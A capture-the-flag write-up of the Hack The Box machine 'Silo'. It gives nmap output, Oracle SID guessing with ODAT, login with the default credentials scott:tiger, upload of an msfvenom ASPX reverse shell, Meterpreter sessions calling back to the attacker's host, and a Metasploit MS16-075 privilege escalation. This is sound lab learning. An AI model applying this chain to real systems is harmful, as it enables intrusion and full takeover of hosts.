# Nmap 7.70 scan initiated Sun Jul 21 16:43:41 2019 as: nmap -sV -sC -O -A -p 80,135,139,445,1521,5985,47001 -oN O-detailed 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (94%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Server 2008 SP1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 7 Professional SP1 (93%), Microsoft Windows 7 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -6m45s, deviation: 0s, median: -6m45s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-07-21 16:37:20
|_ start_date: 2019-07-21 16:20:43
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 231.02 ms 10.10.14.1
2 265.03 ms 10.10.10.82
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 21 16:44:11 2019 -- 1 IP address (1 host up) scanned in 30.90 seconds
So there are 3 web-servers, 3 SMB ports, and 1 Oracle Port. ran gobuster on all the web-servers but found nothing, dropped that vector. SMB ports, guest account was disabled and had no other credentials so dropped that too. Only port left was the Oracle Port. I found CVE-2012-1675, and it's exploit but I was not able to exploit it, either the server was not vulnerable or I had something mis-configured, so path beyond this was manual. However I found a Oracle Pentesting Kit on Github which was useful throughout the complete operation.
Find all the valid databases (SID) on this database.
./odat.py sidguesser -s 10.10.10.82 -p 1521
Found XE and few other to be valid SID, however, I chose to focus on XE.
Check if any default credentials are working on this database on the server.
NOTE: I checked both, UPPERCASE and LOWERCASE variations as 11G stores case sensitive passwords by default. Found scott:tiger to be a set of valid credentials.
Next task was to check if this account is SYSDBA or SYSOPER on this database on the server. I used docker to run sqlplus and check this.
docker run -e URL="scott/tiget@//10.10.10.82:1521/XE as sysdba" -ti sflyr/sqlplus
docker run -e URL="scott/tiget@//10.10.10.82:1521/XE as sysoper" -ti sflyr/sqlplus
It turns out that the user we had was a SYSDBA. One of the module of ODAT let's us put file on the server in a directory of our choosing, as we have web-servers running, we can be sure that there is a directory C:\Inetpub\wwwroot in the system, hence I chose to upload my ASPX MSFVENOM shell there and get a reverse shell.
[*] Started reverse TCP handler on 10.10.14.8:9999
msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.8:9999 -> 10.10.10.82:49166) at 2019-07-21 23:03:02 +0530
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : SILO
OS : Windows 2012 R2 (Build 9600).
Architecture : x64
System Language : en_GB
Domain : HTB
Logged On Users : 0
Meterpreter : x64/windows
User Own
c:\Users\Phineas\Desktop>type user.txt
type user.txt
92ede***
Root Own
msf5 exploit(multi/handler) > search local_exploit_suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.82 - Collecting local exploits for x64/windows...
[*] 10.10.10.82 - 11 exploit checks are being tried...
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 832 launched.
[*] Reflectively injecting the exploit DLL into 832...
[*] Injecting exploit into 832...
[*] Exploit injected. Injecting exploit configuration into 832...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.82
[*] Meterpreter session 3 opened (10.10.14.8:4444 -> 10.10.10.82:49186) at 2019-07-21 23:08:45 +0530
C:\Users\Administrator\Desktop>type root.txt
type root.txt
cd39e***
Learning Outcome
Setting up MSF for Oracle Pentest sucks, ODAT was a real life saver. Oracle pen-test is real fun.